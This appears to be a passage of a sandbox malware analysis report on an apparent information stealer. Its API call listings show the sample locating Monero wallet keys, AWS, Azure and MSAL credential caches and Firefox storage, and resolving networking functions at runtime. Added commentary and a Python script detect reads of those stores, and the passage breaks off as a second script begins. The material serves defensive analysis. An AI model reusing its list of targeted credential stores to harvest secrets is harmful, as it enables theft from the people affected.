                          • lstrcat.KERNEL32(00000000,00731794), ref: 00702081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007020AC
                          • lstrlen.KERNEL32(?), ref: 007020E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702104
                          • lstrcat.KERNEL32(00000000,?), ref: 00702112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702139
                          • lstrlen.KERNEL32(00731794), ref: 0070214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070216B
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00702177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007021A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007021D4
                          • lstrlen.KERNEL32(?), ref: 007021EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070220A
                          • lstrcat.KERNEL32(00000000,?), ref: 00702218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702242
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070227F
                          • lstrlen.KERNEL32(010DCD40), ref: 0070228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007022B1
                          • lstrcat.KERNEL32(00000000,010DCD40), ref: 007022B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007022F7
                          • lstrcat.KERNEL32(00000000), ref: 00702304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00702356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007023BF
                          • DeleteFileA.KERNEL32(00000000), ref: 007023F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 00702444
                          • FindClose.KERNEL32(00000000), ref: 00702453
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: dc0e7f45da7966c9bd93bdc05ea4b93a66ad1a508805902f9595d90440983deb
                          • Instruction ID: 47f8091e11e92e7f86c16ae984f1bca949ddd0d4e4b7134f27ee3b430bf3ae8d
                          • Opcode Fuzzy Hash: dc0e7f45da7966c9bd93bdc05ea4b93a66ad1a508805902f9595d90440983deb
                          • Instruction Fuzzy Hash: 83E13672A25616DBCB21EFA4DD8DA9E77F9AF04300F044264F805B7292DF38DD068B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716445
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007164AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007164E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: c8f2099d447987004c26b542343a6db1de07b919365e4941494c41532722bb09
                          • Instruction ID: 37c26d9e2509b56de16b0f45e0ad3e68fb8c0f2b2c447be3cb1a523f5cf35764
                          • Opcode Fuzzy Hash: c8f2099d447987004c26b542343a6db1de07b919365e4941494c41532722bb09
                          • Instruction Fuzzy Hash: C2F16DB1A25215DBCB21AF6CD84DAAE77F5AF44300F048168B855E72D2DB3CDD86CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007143A3
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007143D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 007143FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00714409
                          • lstrlen.KERNEL32(\storage\default\), ref: 00714414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0071443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00714471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714498
                          • lstrcpy.KERNEL32(00000000,?), ref: 007144D7
                          • lstrcat.KERNEL32(00000000,?), ref: 007144DF
                          • lstrlen.KERNEL32(00731794), ref: 007144EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714507
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00714513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 0071451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00714547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007145A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007145A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714601
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714653
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071467B
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007146AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: 43f584ff7a3b6c6fbb734cd92724a17380d10da828d95d1d1e4208bf1acbec16
                          • Instruction ID: 8f47f840205b18df25ba83dd8e2f827a2816c6f1ac35e5147ab1fee1b8ef5ac4
                          • Opcode Fuzzy Hash: 43f584ff7a3b6c6fbb734cd92724a17380d10da828d95d1d1e4208bf1acbec16
                          • Instruction Fuzzy Hash: B6B15172A25616DBCB21EF7CDD4DA9E77E9AF04700F044224B845E7292DB3CED468B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007157D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00715804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00715868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007158C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007158D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007158F8
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00715961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715988
                          • lstrlen.KERNEL32(00731794), ref: 0071599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007159B9
                          • lstrcat.KERNEL32(00000000,00731794), ref: 007159C5
                          • lstrlen.KERNEL32(010DCCB0), ref: 007159D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007159F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00715A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00715A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00715AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00715B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00715B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 00715B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715BB5
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00715BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00715C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: 0d7c67e3fa40a3136c41e8dded72bdfe50f9a1c01371d50bb2a191085d727c25
                          • Instruction ID: 1a197adb6d0d35deee7dfffdcf35ef224add087315a79f19bd41b93d413b49ca
                          • Opcode Fuzzy Hash: 0d7c67e3fa40a3136c41e8dded72bdfe50f9a1c01371d50bb2a191085d727c25
                          • Instruction Fuzzy Hash: 5C028271A15605DFCB25EF6CD88DAEE7BF5AF84300F044228F805A7291DB78DD868B90
                          APIs
                            • Part of subcall function 00701120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00701135
                            • Part of subcall function 00701120: RtlAllocateHeap.NTDLL(00000000), ref: 0070113C
                            • Part of subcall function 00701120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00701159
                            • Part of subcall function 00701120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00701173
                            • Part of subcall function 00701120: RegCloseKey.ADVAPI32(?), ref: 0070117D
                          • lstrcat.KERNEL32(?,00000000), ref: 007011C0
                          • lstrlen.KERNEL32(?), ref: 007011CD
                          • lstrcat.KERNEL32(?,.keys), ref: 007011E8
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070121F
                          • lstrlen.KERNEL32(010D89A0), ref: 0070122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701251
                          • lstrcat.KERNEL32(00000000,010D89A0), ref: 00701259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00701264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00701294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007012BA
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007012FF
                          • lstrlen.KERNEL32(010DCD40), ref: 0070130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701335
                          • lstrcat.KERNEL32(00000000,?), ref: 0070133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701378
                          • lstrcat.KERNEL32(00000000), ref: 00701385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007013AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 007013D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701401
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070143D
                            • Part of subcall function 0071EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0071EE12
                          • DeleteFileA.KERNEL32(?), ref: 00701471
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: 420f4eaf067ee40a882c130aa99fd0ae0a2cecb48d3c64edda6feb5e4d47db4c
                          • Instruction ID: 69d278526d46f77214c3c9a2b5dd51bfd5bcc3f695551265e3ffdf86521b94b3
                          • Opcode Fuzzy Hash: 420f4eaf067ee40a882c130aa99fd0ae0a2cecb48d3c64edda6feb5e4d47db4c
                          • Instruction Fuzzy Hash: D8A16472A15205DBCB21EFB8DD8DA9E77F9AF44300F444224F905E7292DB78ED059B90
                          APIs
                          • memset.MSVCRT ref: 0071E740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0071E769
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E79F
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 0071E7C6
                          • memset.MSVCRT ref: 0071E805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0071E82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E85F
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 0071E886
                          • memset.MSVCRT ref: 0071E8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0071E8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E920
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0071E947
                          • memset.MSVCRT ref: 0071E986
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: b11e861a5ce297dda6c2525687fc73b72edaf1e3a8a165fd35a1071d9e6762f2
                          • Instruction ID: a6a547ebc90a5d9d470ed35c2ebf9c2b1724570ac02a6b6db8ffdcf180db2df3
                          • Opcode Fuzzy Hash: b11e861a5ce297dda6c2525687fc73b72edaf1e3a8a165fd35a1071d9e6762f2
                          • Instruction Fuzzy Hash: 84712DB1A50219EBD725EB68DC4AFED7374AF48700F044494BB19AB1C1DEB8AE848B54
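The two routines above build the paths of credential stores. The first opens HKEY_CURRENT_USER (0x80000001) key SOFTWARE\monero-project\monero-core with KEY_READ (0x20119), reads the wallet_path value, appends .keys (with \Monero\wallet.keys as the alternative path), copies the file with CopyFileA and then calls DeleteFileA. The second resolves CSIDL_PROFILE (0x28) and CSIDL_LOCAL_APPDATA (0x1C) through SHGetFolderPathA and appends \.azure\, \.aws\ and \.IdentityService\ (where msal.cache lives) before enumerating with *.*. The Python below is an added detection example written for this report, not Joe Sandbox output or the sample's code: it replays file-access events against exactly those targets and flags any reader outside an allowlist. The pipe-separated event format, the process names, the user paths and the allowlist are assumptions to be tuned per estate.

```python
r"""Flag file reads and copies aimed at the credential stores this sample
builds paths for: <wallet_path>.keys / \Monero\wallet.keys, \.aws\, \.azure\,
\.IdentityService\ and msal.cache.  Added example, not Joe Sandbox or sample
code.  The event format and the reader allowlist are assumptions."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Ordered (label, pattern) pairs taken from the string arguments in the call
# listings.  Matching is done on a lower-cased path with "/" folded to "\".
CREDENTIAL_TARGETS = [
    ("monero_wallet_keys", re.compile(r"\\monero\\wallet\.keys$|\.keys$")),
    ("aws_cli_credentials", re.compile(r"\\\.aws\\")),
    ("azure_cli_profile", re.compile(r"\\\.azure\\")),
    ("msal_token_cache", re.compile(r"\\\.identityservice\\|\\msal\.cache$")),
]

# Assumption: images that legitimately open each store; tune per estate.
EXPECTED_READERS = {
    "monero_wallet_keys": {"monero-wallet-gui.exe", "monero-wallet-cli.exe"},
    "aws_cli_credentials": {"aws.exe", "terraform.exe", "python.exe"},
    "azure_cli_profile": {"python.exe", "pwsh.exe", "powershell.exe"},
    "msal_token_cache": {"code.exe", "pwsh.exe", "powershell.exe", "python.exe"},
}


@dataclass(frozen=True)
class Hit:
    pid: int
    image: str          # basename of the accessing process
    path: str           # path as logged
    target: str         # label from CREDENTIAL_TARGETS
    expected_reader: bool


def normalise(path: str) -> str:
    return path.replace("/", "\\").lower()


def classify(path: str) -> Optional[str]:
    """Return the target label for a path, or None if it is not a known store."""
    p = normalise(path)
    for label, pattern in CREDENTIAL_TARGETS:
        if pattern.search(p):
            return label
    return None


def parse_event(line: str) -> Optional[dict]:
    """Constructed line format: ts|pid|image|op|path (op is read/copy/write)."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    ts, pid, image, op, path = parts
    return {"ts": ts, "pid": int(pid), "image": image, "op": op, "path": path}


def scan(lines: Iterable[str]) -> List[Hit]:
    """Return one Hit per read/copy of a credential store, in log order."""
    hits: List[Hit] = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["op"] not in ("read", "copy"):
            continue
        label = classify(ev["path"])
        if label is None:
            continue
        exe = normalise(ev["image"]).rsplit("\\", 1)[-1]
        hits.append(Hit(ev["pid"], exe, ev["path"], label,
                        exe in EXPECTED_READERS[label]))
    return hits


def unexpected(hits: Iterable[Hit]) -> List[Hit]:
    """The hits worth paging on: a store opened by a process that never should."""
    return [h for h in hits if not h.expected_reader]


# Constructed sample events mirroring what the sample does (file.exe reading
# a wallet key file, the AWS CLI credentials and the MSAL cache) plus benign
# lines that must not fire.
SAMPLE_EVENTS = [
    r"2024-11-25T10:01:02|4120|C:\Users\alice\Downloads\file.exe|read|C:\Users\alice\Documents\Monero\wallets\main.keys",
    r"2024-11-25T10:01:02|4120|C:\Users\alice\Downloads\file.exe|copy|C:\Users\alice\.aws\credentials",
    r"2024-11-25T10:01:03|4120|C:\Users\alice\Downloads\file.exe|read|C:/Users/alice/AppData/Local/.IdentityService/msal.cache",
    r"2024-11-25T10:01:03|4120|C:\Users\alice\Downloads\file.exe|read|C:\Users\alice\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    r"2024-11-25T10:02:10|2288|C:\Program Files\Amazon\AWSCLIV2\aws.exe|read|C:\Users\alice\.aws\config",
    r"2024-11-25T10:02:11|4120|C:\Users\alice\Downloads\file.exe|write|C:\Users\alice\AppData\Local\Temp\out.bin",
]

if __name__ == "__main__":
    for h in unexpected(scan(SAMPLE_EVENTS)):
        print(f"pid={h.pid} {h.image} -> {h.target}: {h.path}")
```

The allowlist is the part that matters in production: the paths alone fire constantly for the AWS CLI, az and VS Code, so the signal is the pairing of store and reader, and a Downloads\*.exe touching three different stores within a second should page regardless of the list.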
                          APIs
                          • lstrcpy.KERNEL32 ref: 0071ABCF
                          • lstrlen.KERNEL32(010DD960), ref: 0071ABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071AC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071AC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071ACB7
                          • lstrlen.KERNEL32(00734AD4), ref: 0071ACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071ACF3
                          • lstrcat.KERNEL32(00000000,00734AD4), ref: 0071ACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AD28
                          • lstrlen.KERNEL32(00734AD4), ref: 0071AD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AD5C
                          • lstrcat.KERNEL32(00000000,00734AD4), ref: 0071AD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AD91
                          • lstrlen.KERNEL32(010DDB10), ref: 0071ADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071ADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071ADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071AE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071AE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AE6F
                          • lstrlen.KERNEL32(00000000), ref: 0071AE85
                          • lstrcpy.KERNEL32(00000000,010DDAB0), ref: 0071AEB8
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: 879740a29a12d0888bf00901d902eceb035c01390d8910639e0fa56422396509
                          • Instruction ID: 2ac57b49f7bc123800e51197bec7bbe4e32d2dbb50f64a2a6b89c3b618018786
                          • Opcode Fuzzy Hash: 879740a29a12d0888bf00901d902eceb035c01390d8910639e0fa56422396509
                          • Instruction Fuzzy Hash: 01B17071A25616EBCB21EF6CDC4DAAFB3B5AF00300F044524B815A72D2DB78DD45DB91
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,007172A4), ref: 007247E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 007247FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0072480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0072481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 0072482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00724840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 00724851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 00724862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00724873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00724884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 00724895
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: 4bd402597075f028846811c4df9272fd33a7cc97bb2290bc02832c8945d065c0
                          • Instruction ID: d8baa461fddd24e46b7c11d5ae1ac41c4a6df4afa3eaba45b6f8d2c85faf781c
                          • Opcode Fuzzy Hash: 4bd402597075f028846811c4df9272fd33a7cc97bb2290bc02832c8945d065c0
                          • Instruction Fuzzy Hash: 5211DBB697A724AFD724EFB5AD0DB573AB8BB0A70A704081AF151D2161DBF84400FF90
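The routine above loads ws2_32.dll with LoadLibraryA and resolves its ten Winsock exports by name with GetProcAddress, which keeps the networking code out of the import table (the "Extensive use of GetProcAddress" signature in the overview). In an unpacked dump the name arguments sit as adjacent NUL-terminated ASCII strings, so a tight cluster of them is a quick way to locate the network stub in a memory image. The Python below is an added triage example written for this report, not Joe Sandbox or sample code: it extracts printable runs from a byte blob and reports clusters of known API names. The dump bytes are constructed, and the window and threshold values are assumptions.

```python
r"""Locate the block of Winsock export names that the sample feeds to
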